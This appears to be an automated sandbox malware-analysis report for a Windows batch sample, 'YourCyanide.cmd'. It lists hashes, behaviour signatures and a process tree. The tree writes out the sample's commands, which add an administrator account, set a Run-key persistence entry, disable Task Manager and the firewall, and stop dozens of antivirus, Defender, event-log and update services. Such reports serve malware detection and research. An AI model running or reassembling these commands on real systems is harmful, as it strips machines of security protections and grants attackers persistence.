Resubmissions
15-11-2024 12:51
241115-p3ywnsthmh 918-05-2022 00:35
220518-axmh5abbc9 1018-05-2022 00:32
220518-avncmsbbb7 10Analysis
-
max time kernel
5s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
18-05-2022 00:32
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide.cmd
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
YourCyanide.cmd
Resource
win10v2004-20220414-en
General
-
Target
YourCyanide.cmd
-
Size
90KB
-
MD5
4cb725f17bec289507f9e8249c8ea80e
-
SHA1
a7034e84cb884bf90e61ce3b621424bec57334ae
-
SHA256
1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
-
SHA512
776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
Malware Config
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
scrnsave.scrdescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run scrnsave.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4360_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" scrnsave.scr -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1948 taskkill.exe -
NTFS ADS 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exenet1.execmd.exenet1.exenet.exescrnsave.scrnetsh.exepowershell.exenet.exescrnsave.scrconhost.exetskill.exenet1.exetskill.exeWScript.exepid process 1960 powershell.exe 1960 net1.exe 692 cmd.exe 692 cmd.exe 1092 net1.exe 1092 net1.exe 1356 net.exe 1356 net.exe 1916 scrnsave.scr 1916 scrnsave.scr 780 netsh.exe 780 netsh.exe 1280 powershell.exe 1280 powershell.exe 1704 net.exe 1704 net.exe 1672 scrnsave.scr 1672 scrnsave.scr 1592 conhost.exe 1592 conhost.exe 2020 tskill.exe 2020 tskill.exe 1660 net1.exe 1660 net1.exe 1344 tskill.exe 1344 tskill.exe 584 WScript.exe 584 WScript.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exescrnsave.scrdescription pid process Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 1948 scrnsave.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet1.execmd.execmd.exedescription pid process target process PID 916 wrote to memory of 960 916 cmd.exe attrib.exe PID 916 wrote to memory of 960 916 cmd.exe attrib.exe PID 916 wrote to memory of 960 916 cmd.exe attrib.exe PID 916 wrote to memory of 1712 916 cmd.exe rundll32.exe PID 916 wrote to memory of 1712 916 cmd.exe rundll32.exe PID 916 wrote to memory of 1712 916 cmd.exe rundll32.exe PID 916 wrote to memory of 900 916 cmd.exe cmd.exe PID 916 wrote to memory of 900 916 cmd.exe cmd.exe PID 916 wrote to memory of 900 916 cmd.exe cmd.exe PID 916 wrote to memory of 1944 916 cmd.exe cmd.exe PID 916 wrote to memory of 1944 916 cmd.exe cmd.exe PID 916 wrote to memory of 1944 916 cmd.exe cmd.exe PID 916 wrote to memory of 2028 916 cmd.exe cmd.exe PID 916 wrote to memory of 2028 916 cmd.exe cmd.exe PID 916 wrote to memory of 2028 916 cmd.exe cmd.exe PID 916 wrote to memory of 1996 916 cmd.exe cmd.exe PID 916 wrote to memory of 1996 916 cmd.exe cmd.exe PID 916 wrote to memory of 1996 916 cmd.exe cmd.exe PID 916 wrote to memory of 1184 916 cmd.exe cmd.exe PID 916 wrote to memory of 1184 916 cmd.exe cmd.exe PID 916 wrote to memory of 1184 916 cmd.exe cmd.exe PID 916 wrote to memory of 1960 916 cmd.exe powershell.exe PID 916 wrote to memory of 1960 916 cmd.exe powershell.exe PID 916 wrote to memory of 1960 916 cmd.exe powershell.exe PID 916 wrote to memory of 1332 916 cmd.exe net.exe PID 916 wrote to memory of 1332 916 cmd.exe net.exe PID 916 wrote to memory of 1332 916 cmd.exe net.exe PID 1332 wrote to memory of 1344 1332 net.exe tskill.exe PID 1332 wrote to memory of 1344 1332 net.exe tskill.exe PID 1332 wrote to memory of 1344 1332 net.exe tskill.exe PID 916 wrote to memory of 1916 916 cmd.exe scrnsave.scr PID 916 wrote to memory of 1916 916 cmd.exe scrnsave.scr PID 916 wrote to memory of 1916 916 cmd.exe scrnsave.scr PID 916 wrote to memory of 712 916 cmd.exe cmd.exe PID 916 wrote to memory of 712 916 cmd.exe cmd.exe PID 916 wrote to memory of 712 916 cmd.exe cmd.exe PID 916 wrote to memory of 1640 916 cmd.exe cmd.exe PID 916 wrote to memory of 1640 916 cmd.exe cmd.exe PID 916 wrote to memory of 1640 916 cmd.exe cmd.exe PID 916 wrote to memory of 1984 916 cmd.exe cmd.exe PID 916 wrote to memory of 1984 916 cmd.exe cmd.exe PID 916 wrote to memory of 1984 916 cmd.exe cmd.exe PID 916 wrote to memory of 1660 916 cmd.exe net1.exe PID 916 wrote to memory of 1660 916 cmd.exe net1.exe PID 916 wrote to memory of 1660 916 cmd.exe net1.exe PID 1660 wrote to memory of 1520 1660 net1.exe net.exe PID 1660 wrote to memory of 1520 1660 net1.exe net.exe PID 1660 wrote to memory of 1520 1660 net1.exe net.exe PID 916 wrote to memory of 1948 916 cmd.exe scrnsave.scr PID 916 wrote to memory of 1948 916 cmd.exe scrnsave.scr PID 916 wrote to memory of 1948 916 cmd.exe scrnsave.scr PID 1984 wrote to memory of 2044 1984 cmd.exe scrnsave.scr PID 1984 wrote to memory of 2044 1984 cmd.exe scrnsave.scr PID 1984 wrote to memory of 2044 1984 cmd.exe scrnsave.scr PID 1640 wrote to memory of 1560 1640 cmd.exe net1.exe PID 1640 wrote to memory of 1560 1640 cmd.exe net1.exe PID 1640 wrote to memory of 1560 1640 cmd.exe net1.exe PID 1640 wrote to memory of 1092 1640 cmd.exe net1.exe PID 1640 wrote to memory of 1092 1640 cmd.exe net1.exe PID 1640 wrote to memory of 1092 1640 cmd.exe net1.exe PID 1984 wrote to memory of 524 1984 cmd.exe net.exe PID 1984 wrote to memory of 524 1984 cmd.exe net.exe PID 1984 wrote to memory of 524 1984 cmd.exe net.exe PID 1640 wrote to memory of 296 1640 cmd.exe net.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:960
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:1712
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1184
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2028
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:900
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵PID:1332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:1344
-
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4360_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵PID:1916
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1560
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1092
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:296
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y4⤵PID:364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y5⤵PID:660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs6⤵PID:364
-
-
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1344
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1948
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1104
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y4⤵PID:1332
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y4⤵PID:1796
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1628
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1168
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y4⤵PID:316
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:616
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:876
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1112
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1016
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1628
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1204
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1084
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1900
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2020
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:432
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1768
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1720
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1528
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y4⤵PID:1096
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y4⤵PID:1560
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:616
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1544
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y4⤵PID:956
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:836
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1712
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1400
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:844
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1132
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y4⤵PID:1560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y5⤵PID:1564
-
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y4⤵PID:584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1960
-
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1620
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1672
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:660
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1968
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1012
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1660
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1280
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:836
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1916
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1816
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:584
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:852
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:316
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1768
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1880
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵PID:1660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:1520
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
PID:1948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:584
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1960
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:640
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1720
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1528
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1620
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:876
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:848
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:692
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1052
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y4⤵PID:1280
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:844
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:572
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1560
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:108
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y4⤵PID:1680
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:848
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1044
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2044
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1052
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1624
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y4⤵PID:832
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1344
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1880
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:692
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1356
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1016
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:876
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:712
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:848
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1948
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2004
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1712
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1112
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y4⤵PID:780
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:876
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1320
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1912
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1552
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:836
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1916
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:780
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1968
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1592
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1280
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:640
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2000
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2004
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1280
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1916
-
-
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵PID:108
-
-
C:\Windows\system32\net.exenet stop "security center"2⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:1876
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:2020
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:2000
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:1092
-
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:1936
-
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:2044
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1616
-
-
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:2008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y4⤵PID:936
-
-
-
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵PID:1880
-
-
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:1500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:1012
-
-
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1912
-
-
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:1624
-
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:1592
-
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:432
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵PID:1012
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:1544
-
-
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:640
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1280
-
-
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵PID:2020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵PID:1964
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵PID:1680
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1956
-
-
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵PID:1168
-
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵PID:596
-
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵PID:692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵PID:2000
-
-
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵PID:1488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵PID:1092
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y4⤵PID:1616
-
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵PID:1964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵PID:904
-
-
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵PID:1680
-
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵PID:1096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵PID:2000
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵PID:560
-
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵PID:1092
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵PID:780
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵PID:524
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵PID:564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵PID:1548
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵PID:296
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1620
-
-
C:\Windows\system32\net.exenet stop spoolnt2⤵PID:1320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵PID:1880
-
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵PID:1816
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1912
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:640
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1548
-
-
